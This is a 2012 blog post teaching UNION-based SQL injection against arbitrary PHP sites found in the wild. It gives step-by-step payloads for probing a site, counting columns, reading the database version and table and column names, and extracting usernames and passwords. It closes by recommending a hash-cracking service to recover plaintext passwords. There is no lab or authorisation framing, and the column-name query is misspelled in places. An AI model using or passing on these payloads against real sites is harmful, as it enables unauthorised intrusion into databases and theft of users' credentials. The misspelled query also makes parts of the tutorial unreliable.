Recent Posts

Thursday, July 12, 2012

UNION-Based (Basic) SQL Injection

Today, I think you should learn UNION-Based (Basic) SQL Injection!

Here is what to do:

1) Find a site that Uses PHP. It should end in (ex.) php?id=... or …php?p=… (etc.) Then type in the end (or before the last number) . (Single Quote)
ex. www.mysite.com/game.php?id=1′
If you get an error, you may proceed. (Means that the Site is Vulnerable!)
2) Erase the single quote you typed before, and type at the end order by 1– and the number shows the number of the tables that the database of the site has.
ex. .com/game.php?id=1 order by 1–(It shouldn’t get any error…)
3) Continue typing numbers (2,4,5,7 etc…) until it get an error. The last number that doesn’t get error is the number of the tables that the Database has!
ex. our site has 4 tables when:
id=1 order by 5– (gets an error)
id=1 order by 4– (doesn’t get error) – So, the number of tables the Site’s database has is 4!
4) this (in our example) will display the table that are vulnerable.
union all select 1,2,3,4–
ex. www.site.com/game?id=-1 union all select 1,2,3,4–
(You should see many Numbers at many different areas of the page. – These numbers are the numbers of the vulnerable tables)
5) to find the version of the SQL type @@version instead of the vulnerable table number that is at the top (ALWAYS AT THE TOP).
union all select 1,2,@@version,4–
ex. id=-1 union all select 1,2,3,@@version (if the 3rd table is vulnerable and is at the top – if it is NOT the one that is at the top of the other numbers, the attack will not succeed!)
You should see the MySQL version of the Site. It should be 5.+. If it is less than 5, we need other methods to extract information.
6) to display Table Names type:
ex. union all select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()–
(You see that the SQL Command is inserted at the vulnerable table we got at the “Union all Select” Statement – in our example ‘4‘) — Don’t freak out if it is difficult for you to learn the commands! Take notes and you will learn them after a while…
7) To display the Collum Names we type:
ex. union all select 1,2,3,group_concat(collumn_name) from information_schema.collumns where table_name=CHAR(117, 115, 101, 114, 115)–

The CHAR() is a MySQL Function. You can get the HackBar Add-On for Firefox that can convert a string (like ‘users’) to the appropriate format!
The CHAR() contains Numbers which are the converted format of the Table we need. In this example, “users”

8) To display the collumns we want (let’s say “username” and “password”) from a table (let’s say “users”) we type:
ex. union all select 1,2,group_concat(username,0x3a,password),4 from users–
username: collumn to display
password: collumn to display
0x3a: HEX Character: says the browser to display the info like this: user:pass
users: table to search

NOTE: The passwords are usually in MD5 hash encryption (or SHA-1). Use a Service to unhash it! Like:
http://www.md5decrypter.co.uk/
That’s it! This was the Union-Based SQL Injection!

0 comments:

Post a Comment